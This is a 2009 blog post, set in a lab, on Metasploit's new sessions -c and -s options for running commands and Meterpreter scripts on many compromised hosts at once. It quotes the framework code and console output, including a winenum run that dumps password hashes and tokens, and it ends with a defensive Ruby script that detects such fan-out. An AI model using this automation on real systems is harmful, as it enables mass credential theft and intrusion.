New Options in Msfconsole Sessions Command


By Blog
On [2009-12-28] at 13:44:52



Metasploit recently added 2 new options to the sessions command in msfconsole. These 2 options are the ability to run a command on all open sessions and the ability to run a Meterpreter script on all sessions that are of Meterpreter type. I consider these 2 options game changers when it comes to post exploitation, since now one can run a command throughout a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, with -c for command execution and -s for script execution:

    msf exploit(handler) > sessions -h
    Usage: sessions [options]

    Active session manipulation and interaction.

    OPTIONS:

        -K  Terminate all sessions.
        -c  Run a command on all live sessions
        -d  Detach an interactive session
        -h  Help banner.
        -i  Interact with the supplied session identifier.
        -k  Terminate session.
        -l  List all active sessions.
        -q  Quiet mode.
        -s  Run a script on all live meterpreter sessions
        -v  List verbose fields.

    msf exploit(handler) >

Currently I have 5 sessions open to different systems, all behind a series of firewalls; that is why all sessions appear to come from a single IP.

    msf exploit(handler) > sessions -l

    Active sessions
    ===============

      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441
      2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920
      3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396
      4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686
      5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197

    msf exploit(handler) >

Another very useful option that was added is -v for verbose. It lets us know whether the session was the result of an exploit (and which exploit) or was received by Multi Handler.

    msf exploit(handler) > sessions -v

    Active sessions
    ===============

      Id  Description  Tunnel                                     Via
      --  -----------  ------                                     ---
      1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441  multi/handler
      2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920  multi/handler
      3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396   multi/handler
      4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686  multi/handler
      5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197  multi/handler

    msf exploit(handler) >

Here is the code that is executed when the -c option is run:

     1  cmds.each do |cmd|
     2    framework.sessions.each_sorted do |s|
     3      session = framework.sessions.get(s)
     4      print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")
     5      if (session.type == "meterpreter")
     6        c,args = cmd.split(' ', 2)
     7        begin
     8          process = session.sys.process.execute(c, args, {
     9            'Channelized' => true,
    10            'Hidden'      => true
    11          })
    12        rescue ::Rex::Post::Meterpreter::RequestError
    13          print_error("Failed: #{$!.class} #{$!}")
    14
    15        end
    16        print_line(process.channel.read) if process and process.channel
    17      elsif session.type == "shell"
    18        # Then it's a regular shell, just send the command
    19        # to the session's stdin.
    20        session.write_shell(cmd + "\n")
    21        # read_shell blocks with no timeout, so we wrap
    22        # it in a select in case there is no output
    23        # from the command
    24        if select([session.rstream], nil, nil, 3)
    25          output = session.read_shell
    26          print_line(output)
    27        end
    28      end
    29      # If the session isn't a meterpreter or shell type, it
    30      # could be a VNC session (which can't run commands) or
    31      # something custom (which we don't know how to run
    32      # commands on), so don't bother.
    33    end
    34  end

As can be seen in lines 1 and 2, all commands are iterated one by one against each available session. Then in lines 5 and 17 the sessions are checked to see whether each one is a Meterpreter shell or a simple command shell. This means we can write plug-ins that automate against both types of shell using this code as an example.

As can be seen in line 8, the type of command that we can run is a system command, so none of the other Meterpreter commands can be used. Also, one important thing to notice is that the rules for operating in a shell apply, so one must be careful not to run commands that can break a shell, like WMIC or certain types of SC. Let's run the hostname command on all shells:

    msf exploit(handler) > sessions -c hostname
    Running 'hostname' on session 1 (192.168.1.138:50441)
    winxplab01
    Running 'hostname' on session 2 (192.168.1.138:54920)
    win2k3lab01
    Running 'hostname' on session 3 (192.168.1.138:1396)
    win701
    Running 'hostname' on session 4 (192.168.1.138:61686)
    winvis01
    Running 'hostname' on session 5 (192.168.1.138:57197)
    WIN-YR4V852V71Y
    msf exploit(handler) >

Now, if we want to run commands with arguments, we have to enclose the command and the arguments in quotes. Also remember that since this is Ruby, special characters must be escaped where it applies. For example:

    msf exploit(handler) > sessions -c 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'
    Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 1 (192.168.1.138:50441)
    REG.EXE VERSION 3.0
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
        ProductName    REG_SZ    Microsoft Windows XP
    Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 2 (192.168.1.138:54920)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
        ProductName    REG_SZ    Microsoft Windows Server 2003
    Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 3 (192.168.1.138:1396)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
        ProductName    REG_SZ    Windows 7 Enterprise
    Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 4 (192.168.1.138:61686)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
        ProductName    REG_SZ    Windows Vista (TM) Enterprise
    Running 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' on session 5 (192.168.1.138:57197)
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
        ProductName    REG_SZ    Windows Server (R) 2008 Enterprise
    msf exploit(handler) >

The -s option for running a script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option. These are:

- Proper logging of data will become very important due to the possibility that a large number of shells are processed.
- Logs should reference the host name or host local IP of a target, since many systems are now behind NAT firewalls.
- Multi-threading will be of great importance since each session is handled sequentially, so having multi-threaded scripts will be a great time saver.
- Scripts should at least output the hostname so the attacker can know what host he is currently running the script against.
- At the moment the script must run without options.

Here is the code executed when using this option:

     1  if not script.nil?
     2    print_status("Running script #{script} on all meterpreter sessions ...")
     3    framework.sessions.each_sorted do |s|
     4      if ((session = framework.sessions.get(s)))
     5        if (session.type == "meterpreter")
     6          print_status("Session #{s} (#{session.tunnel_peer}):")
     7          begin
     8            client = session
     9            client.execute_script(script, binding)
    10          rescue ::Exception => e
    11            log_error("Error executing script: #{e.class} #{e}")
    12          end
    13        end
    14      end
    15    end
    16  else
    17    print_error("No script specified!")
    18  end

As can be seen in line 5, only the sessions that are of Meterpreter type are the ones that will be interacted with. Here is a summarized version of running winenum:

    msf exploit(handler) > sessions -s winenum
    Running script winenum on all meterpreter sessions ...
    Session 1 (192.168.1.138:50441):
    Running Windows Local Enumerion Meterpreter Script
    New session on 192.168.1.138:50441...
    Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt
    Checking if WINXPLAB01 is a Virtual Machine ........
    BIOS Check Failed
    This is a VMWare virtual Machine
    Running Command List ...
    running command cmd.exe /c set
    running command ipconfig /all
    ..........
    Running WMIC Commands ....
    running command wmic computersystem list brief
    ..........
    Extracting software list from registry
    Dumping and Downloading the Registry entries for Configured Wireless Networks
    Exporting HKLM\Software\Microsoft\WZCSVC\Parameters\Interfaces
    Compressing key into cab file for faster download
    Downloading wlan_20091225.4410-04411.cab to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/wlan_20091225.4410-04411.cab
    Deleting left over files
    Dumping password hashes...
    Hashes Dumped
    Getting Tokens...
    All tokens have been processed
    Done
    Session 2 (192.168.1.138:54920):
    Running Windows Local Enumerion Meterpreter Script
    New session on 192.168.1.138:54920...
    Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt
    Checking if WIN2K3LAB01 is a Virtual Machine ........
    This is a VMware Workstation/Fusion Virtual Machine
    Running Command List ...
    running command cmd.exe /c set
    ..........
    Running WMIC Commands ....
    running command wmic computersystem list brief
    ..........
    Extracting software list from registry
    Dumping password hashes...
    Hashes Dumped
    Getting Tokens...
    All tokens have been processed
    Done
    Session 3 (192.168.1.138:1396):
    Running Windows Local Enumerion Meterpreter Script
    New session on 192.168.1.138:1396...
    Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt
    Checking if WIN701 is a Virtual Machine ........
    This is a VMware Workstation/Fusion Virtual Machine
    Checking if UAC is enabled ...
    UAC is Enabled
    Running Command List ...
    running command cmd.exe /c set
    ..........
    Running WMIC Commands ....
    running command wmic computersystem list brief
    ..........
    Extracting software list from registry
    UAC is enabled, Wireless key Registry could not be dumped under current privileges
    - Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.
    Getting Tokens...
    Error Getting Tokens: Rex::TimeoutError Operation timed out.
    Done
    Session 4 (192.168.1.138:61686):
    Running Windows Local Enumerion Meterpreter Script
    New session on 192.168.1.138:61686...
    Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt
    Checking if WINVIS01 is a Virtual Machine ........
    This is a VMware Workstation/Fusion Virtual Machine
    Checking if UAC is enabled ...
    UAC is Enabled
    Running Command List ...
    running command cmd.exe /c set
    ..........
    Running WMIC Commands ....
    running command wmic computersystem list brief
    ..........
    Extracting software list from registry
    UAC is enabled, Wireless key Registry could not be dumped under current privileges
    - Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.
    Getting Tokens...
    All tokens have been processed
    Done
    Session 5 (192.168.1.138:57197):
    Running Windows Local Enumerion Meterpreter Script
    New session on 192.168.1.138:57197...
    Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt
    Checking if WIN-YR4V852V71Y is a Virtual Machine ........
    This is a VMware Workstation/Fusion Virtual Machine
    Running Command List ...
    running command cmd.exe /c set
    ..........
    Running WMIC Commands ....
    running command wmic computersystem list brief
    ..........
    Extracting software list from registry
    - Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.
    Getting Tokens...
    All tokens have been processed
    Done
    msf exploit(handler) >

As can be seen, the Framework is advancing: a great number of features and new options are being added. I do have to say that the path in which HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.
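
Seen from the monitored hosts, the -c loop described above makes the same command line start on many machines within seconds of each other. The following is an added example, not code from the original post or from Metasploit, that flags this fan-out in process-creation records; the record fields, the window and host-count thresholds, and the sample events are constructed assumptions.

```ruby
require 'time'

# Process-creation records as a log collector might deliver them (for example
# from Windows event 4688 or Sysmon event 1). Field names, timestamps and the
# benign entries are constructed; host names are the lab hosts from the post.
REG_QUERY = 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'
SAMPLE_EVENTS = [
  { host: 'winxplab01',      time: '2009-12-25T06:12:40Z', cmdline: 'hostname' },
  { host: 'winxplab01',      time: '2009-12-25T10:00:01Z', cmdline: 'hostname' },
  { host: 'win2k3lab01',     time: '2009-12-25T10:00:02Z', cmdline: 'hostname' },
  { host: 'win701',          time: '2009-12-25T10:00:04Z', cmdline: 'Hostname ' },
  { host: 'winvis01',        time: '2009-12-25T10:00:05Z', cmdline: 'hostname' },
  { host: 'WIN-YR4V852V71Y', time: '2009-12-25T10:00:07Z', cmdline: 'hostname' },
  { host: 'winxplab01',      time: '2009-12-25T10:02:10Z', cmdline: REG_QUERY },
  { host: 'win2k3lab01',     time: '2009-12-25T10:02:12Z', cmdline: REG_QUERY },
  { host: 'win701',          time: '2009-12-25T10:02:13Z', cmdline: REG_QUERY },
  { host: 'winvis01',        time: '2009-12-25T10:02:15Z', cmdline: REG_QUERY },
  { host: 'winxplab01',      time: '2009-12-25T08:30:00Z', cmdline: 'ipconfig /all' },
  { host: 'win701',          time: '2009-12-25T08:30:09Z', cmdline: 'ipconfig /all' },
  { host: 'winxplab01',      time: '2009-12-25T01:00:00Z', cmdline: 'svchost.exe -k netsvcs' },
  { host: 'win701',          time: '2009-12-25T03:00:00Z', cmdline: 'svchost.exe -k netsvcs' },
  { host: 'winvis01',        time: '2009-12-25T05:00:00Z', cmdline: 'svchost.exe -k netsvcs' }
].freeze

# Normalise a command line so differences in case or spacing do not split
# one fan-out into several groups.
def normalize(cmdline)
  cmdline.strip.downcase.gsub(/\s+/, ' ')
end

# Return one finding per command line that started on at least `min_hosts`
# distinct hosts within `window` seconds (largest host set per command).
def fanout_findings(events, window: 30, min_hosts: 3)
  findings = []
  events.group_by { |e| normalize(e[:cmdline]) }.each do |cmd, group|
    evs = group.map { |e| [Time.iso8601(e[:time]), e[:host]] }.sort_by(&:first)
    best = nil
    start = 0
    evs.each_with_index do |(ts, _host), i|
      # Slide the left edge until evs[start..i] spans at most `window` seconds.
      start += 1 while ts - evs[start][0] > window
      hosts = evs[start..i].map(&:last).uniq
      next if hosts.size < min_hosts || (best && hosts.size <= best[:hosts].size)
      best = { cmdline: cmd, hosts: hosts.sort, first_seen: evs[start][0], last_seen: ts }
    end
    findings << best if best
  end
  # Widest fan-out first; command line breaks ties so the order is stable.
  findings.sort_by { |f| [-f[:hosts].size, f[:cmdline]] }
end

if __FILE__ == $PROGRAM_NAME
  fanout_findings(SAMPLE_EVENTS).each do |f|
    span = (f[:last_seen] - f[:first_seen]).round
    puts "#{f[:hosts].size} hosts in #{span}s: #{f[:cmdline]}"
  end
end
```

Legitimate fleet-management tooling produces the same pattern, so in practice the thresholds need tuning and known management command lines need an allowlist.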



